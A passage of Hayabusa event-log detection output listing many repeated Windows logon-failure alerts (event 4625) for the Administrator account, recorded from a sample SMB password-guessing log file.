NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: heaYv6Np8swhoVc9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.334 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I7rzgNBtUJkS93pO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gh45suNQ09FzPBjd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BOnwAGxxz994k6Ee : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.474 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L26mvUKOgGptcKaZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:10.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aqldRjcLl8KFZr5h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ycNPBtmRHShPOcRA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ISlMGsVvXry0rbju : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MjGjh70EQ5YVGJUt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yaYM5N2kuvuRCHRU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 32wgj2t7BLBviVxd : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vr1kMRxLEaCIWIbf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4PHEJyKgp5wXRtBk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbaoz8rTZVXUjRAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d4eD3JQ5gquIqgND : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U9slFFSSXhFxPqG1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:11.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YDb5Up4KwJj0hN5n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.063 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DxqIpDLlnf6Xyc34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rTCTTYmKTIzzJwxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oD3dLxlB3qWIhZEQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fe9xMOoCxPJIIyVq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.246 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DW3YgBZYiGTeEw66 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VAKeeIcOeiQ3H9NF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nmF3ot3gJCsBlSwF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wDjoResfZvvVqqE5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V4dwzMwvVtzztGwr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0qklApBFOMxVzucD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:11.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0IJSphtLB3eNARBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PLOFe4w5KpJ2UaGM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cF3JTWkGadY1fJE2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kyTH0jxSZB2YVdhW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NRq5XrcDkFvabCzh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.750 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zlYwlgrsMy1kSgEC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AchwW4ifbZ41AQNg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1PaxF7Q8ue1Kex1h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WAhW2PErXdwNVrx5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.943 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LoAV3ESqieev2JMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wFlWFijaFirgsAtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:12.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hSDjuqvzKLaWCWVo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SL0CVu787iFRLiPU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZQDORN33izpv4tGO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v470yorD43fgGyjC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LBbLWVZFDqFxb7dW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RJsowt9MrhXciLOZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uhCVFyMmDI5shASV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yd4SM9EGM7cnO6Z5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.490 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PSR1tbtzdDaJDbXs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rNqyjBuN0Pq6WRO1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vqpMAmE9OvHbFCh2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:12.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfLQAaB0DPvxWQMB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0kvHMwnj2k0HMLQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kPqfVDftcR4iRDaw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1bltwm2g13InAJM6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J2iFr8ppe5NzukXF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7EEUOBohBFRze6hL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NCOFn3WM71KmaZyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UdUkBxB1auduRfdS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E2JaWoYK56HRGfW1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.015 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a3JTCX9NIOpg6TFB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zFGkdUVAdKcrrREB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:13.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7oZW00FpKema01Vw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p4HbNQx0Acf83b1h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9aM5UCQbOLvcpI0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BGGChEAIdej9lBhr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4CaFYB1ImWAWbH0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OLa3lkxWiJ00raQh : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vMzyi0jIVLNrodC8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n2repX0roAP2j0TI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gqcpIjdkNpmoTe4A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Edgo9UdNvmMJpiyn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LpqOTu7Xn7ULipmN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:13.567 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TP0efL79STMbuu9g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HkwWfRi0E5sVY6UT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IkyCe9NXGExCQS5r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IGnhRwa7P7by9vJO : IP Address: 192.168.198.149 : AuthPackage: 